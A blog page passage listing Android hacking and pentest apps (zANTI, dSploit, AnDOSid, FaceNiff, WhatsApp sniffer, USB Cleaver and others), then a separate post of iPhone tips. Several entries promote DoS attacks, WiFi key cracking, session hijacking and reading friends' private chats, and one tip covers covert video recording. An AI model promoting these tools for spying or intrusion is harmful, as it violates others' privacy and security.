APKInspector analysts and reverse engineers to visualize compiled Android packages and their corresponding DEX code. APKInspector provides both analysis functions and graphic features for the users to gain deep insight into the malicious apps.

18. zANTI

zANTI is a mobile penetration testing toolkit that lets security managers assess the risk level of a network with the push of a button. This easy to use mobile toolkit enables IT Security Administrators to simulate an advanced attacker to identify the malicious techniques they use in the wild to compromise the corporate network.

19. dSploit

dSploit is an Android network analysis and penetration suite which aims to offer to IT security experts/geeks the most complete and advanced professional toolkit to perform network security assessments on a mobile device.

Once dSploit is started, you will be able to easily map your network, fingerprint alive hosts operating systems and running services, search for known vulnerabilities, crack logon procedures of many tcp protocols, perform man in the middle attacks such as password sniffing ( with common protocols dissection ), real time traffic manipulation, etc, etc .

20. AnDOSid

AnDOSid use to launch DoS attacks from your mobile phone. It was developed as a stress testing tool, but you know, anything can be misused, even a pen. AnDOSid is so powerful, that you can even use it to take down web servers.

21. Penetrate Pro

Penetrate Pro is used to calculate WPA/WEP keys for some routers which means it is used for wifi decoding. Some antivirus may flag the app as virus because it uses some security permissions.

22. Nmap for Android

Nmap (network mapper) is open source security scanner used for network exploration. It works on both non-rooted and rooted phones, but if your device is rooted then you have access to some more features.

23. Droid Pentest

Droid Pentest helps you to find all android apps for penetration testing and hacking so you can make complete penetration test platform.

24. Faceniff

FaceNiff is an Android app that allows you to sniff and intercept web session profiles over the WiFi that your mobile is connected to. It is possible to hijack sessions only when WiFi is not using EAP, but it should work over any private networks (Open/WEP/WPA-PSK/WPA2-PSK)

25. Shark

Shark is mainly designed to track activities of other devices. It is basically designed for office staff to have a track on office or team members.

26. USB Cleaver

The goal of the USB Cleaver is to silently recover information from a target Windows 2000 or higher computer, including password hashes, LSA secrets, IP information, etc… beauty lies in the fact that the payload can run silently and without modifying the system or sending network traffic, making it near invisible. It captures all the information to a LOG file stored in your sdcard and can be reviewed at anytime.

27. Whatsapp sniffer

If you want to download private chats, audios and videos of your friends WhatsApp, who uses your WiFi Connection this app is the best choice must try it.

28. WIBR Plus

WIBR Plus is one of the Android hacking apps for testing of security of the WPA/WPA2 PSK WiFi networks.This app detects wireless penetration on a network.

29. AppUse

AppUse is a VM (Virtual Machine) developed by AppSec Labs. It is a unique platform for mobile application security testing in the Android environment, and includes exclusive custom-made tools. AppUse’s core is a custom “hostile” Android ROM, specially built for application security testing containing a modified runtime environment running on top of a customized emulator.

Using rootkit-like techniques, many hooks were injected into the core of its execution engine so that applications can be easily manipulated and observed using its command & control counterpart called “ReFrameworker”. AppUse includes everything the pentester needs in order to run and test target applications: the Android emulator, development tools, the required SDKs, decompilers, disassemblers, etc.

30. Kali Linux NetHunter

Kali NetHunter — from the developers of powerful hacking operating system Kali Linux — you have a powerful, portable, and inexpensive penetration testing platform. The NetHunter has the full power of Kali, and it supports Wireless 802.11 frame injection, one-click MANA Evil Access Point setups, HID keyboard (allows you to launch keyboard attacks on PCs), as well as BadUSB MITM attacks.

31. Intercepter-NG

Intercepter-NG is an android tool for hackers. It can help you to intercept and analyze unencrypted communications over a WiFi network. Things you can do with the help of Intercepter-NG: Intercept communications,Analyze data packets,Hijack sessions,SSL Strip connections,Monitor target’s web activity.

32. Lucky Patcher

Lucky Patcher is a great Android tool to remove ads, modify apps permissions, backup and restore apps, bypass premium applications license verification, and more. To use all features, you need a rooted device.

33. Game Killer

Game Killer is used to hack or modify coins, gems, etc of humanoid games by victimisation technique of memory modifying. Gamekiller has been downloaded by over ten million users worldwide creating it one amongst the foremost downloaded app not obtainable on Google Play store.

However, We are unclear about genuineness of some download sources, so the links are listed separately here. Download at your own risk.

That’s it, with these Android hacking apps you can change your Android smartphone into a small hacking toolkit.

Sunday 8 July 2018

20 Stunning iPhone Features That Apple Doesn’t Talk About


The smartphones designed by Apple have long occupied a strong position in the mobile market. They have become so popular that every other person in large cities carries an iPhone. However, most owners of Apple devices don’t realize how truly powerful their gadgets are.
We at Bright Side have picked some of the most incredible iPhone tricks that can make your iPhone experience better than you ever dreamed.

#1 Setting the sleep timer

Now you can fall asleep listening to your favorite songs or a podcast without worrying that the music will play all night, making your sleep weird. Simply open the Clock app and set the timer for how long you want the music to play. Then, tap the button labeled When Timer Ends and, instead of selecting ringtones that can be played, scroll to the bottom to choose the Stop Playing option. Now you can go to bed — your phone will do the rest of the work for you!

#2 Creating a custom vibration

By default, your iPhone uses standard vibration pulses for a text message. However, you can easily create your own vibration patterns.
Launch the Settings app on your iPhone. Then tap on Sounds, and select an alert type in the Sounds and Vibrations list. Tap Vibration > Create New Vibration.
Start recording, and tap the center of the screen in the sequence you want the vibration to be. Once you’re done, stop recording and save your pattern. It will be stored in the Vibration section (Ringtone menu) among the list of custom patterns.
In addition, you can set a custom vibration for all the contacts in your phonebook.

#3 Clearing your iPhone’s RAM

One simple trick to make your iPhone run faster in no time is to clear its Random Access Memory. To do this, you should follow these simple steps:
Press and hold the Sleep/Wake button until you see the ’slide to power off’ message.
After that, release the Sleep/Wake button, and press and hold the Home button.
In a couple of seconds, your iPhone screen will flicker a bit and will return back to the home screen. Your iPhone or iPad’s RAM will be cleaned out, leaving your device noticeably quicker.

#4  iMessage timestamps

If you want to see the exact time that a specific message was sent, follow these simple steps:
Open the Messages app.
Tap on the message thread that you’d like to view a particular timestamp for.
Slide your finger from right to left.
Now you can see the timestamps for each individual message.

#5 Enabling text message character count

You can turn on character counting on your iPhone so you know how many characters each text message is before you send it:
Tap the Settings icon, and scroll to the Messages option.
In the Messages section, tap the button to the right of Character Count to turn it on.
Ta-da! As soon as you start typing your text message, the character count will display.

#6 Recording a video while the screen is locked

If you don’t want other people to notice you recording video or taking pictures, perform the following steps:
Make sure your iPhone is locked. Press the Shutter button, slide the bottom right camera icon halfway up and don’t let go.
Keeping your finger on the camera slider mode still halfway up, slide the camera mode to video.
Double press the Home button three times.
Keep your finger still halfway on the slider until the iPhone turns off its screen. Remember: your iPhone is already recording a video.
If you want to end the recording, simply unlock the iPhone as usual.

#7 Rewinding audio and video tracks

You can make the audio/video scrubbing speed faster or slower by simply moving the slider. The yellow area is used for fast scrubbing. If you move your finger to the red area, you’ll get to ’half-speed scrubbing,’ and the green area is even slower.

#8 Dialing an extension

If you want to dial an extension, dial the main number you’re calling first and then hold down the ’*’ button until a comma appears. Finally, enter the extension number after the comma and press the Call button.

#9 Blocking ads in iPhone/iPad games

Do you get annoyed by those ads when you play games or use apps on your iPhone or iPad? If so, here’s a simple way to block/disable the mobile ads on your device for free. Simply put your phone into Airplane Mode to temporarily turn off the phone’s radios, and you’ll be able to play most games without the annoying ads.
#10 Changing the direction of Panorama mode

Change the direction of Panorama mode before shooting in iOS by simply tapping the arrow on the screen.

#11 Deleting digit(s) in the Calculator app

If you made a mistake in the digit that you typed, just swipe your finger to the left or right of the numbers to clear the last digit.

#12 Making an emergency call

Filling out the Medical ID on your iPhone can save your life. The Medical ID section lets you store all your important medical information so that it’s available in a one-tap access in emergencies. At the very least, you should fill out the information regarding your blood type as well as indicate the medicines you are allergic to.

#13 Restoring recently closed Safari tabs

If you accidentally closed a tab, or wish to reopen one you recently accessed, simply press and hold the plus button at the bottom of the screen.

#14 Using Google Maps offline

You can download the maps for offline use by typing ’ok maps’ into the map search box.

#15 Hidden Field Test app

All iPhones have secret service codes, which you can use to get various information about the gadget, mobile operator, and cellular network. For example, if you enter *3001#12345#* code, you will see a hidden menu with information on SIM card, network operator, signal strength, etc.

#16 Improving Wi-Fi speed on an iPhone

Using the Wi-Fi Assist function you can easily set up your phone to automatically switch over to the cellular connection when the Wi-Fi network signal is poor.

#17 Restarting your iPhone

Everyone has probably experienced the situation when your phone hangs, gets frozen, and refuses to work. Give your iPhone a little rest. To do this, press and hold down the On/Off switch and the Home button simultaneously until the screen turns off (it can take up to 10 seconds). Once you’re done, your iPhone will reboot and you’ll see the Apple logo.
Note, please: Rebooting your iPhone with this force reboot method is an extreme measure. You shouldn’t use it too often.

Hope you'll find this post interesting, leave a comment below and don't forget to share with family and friends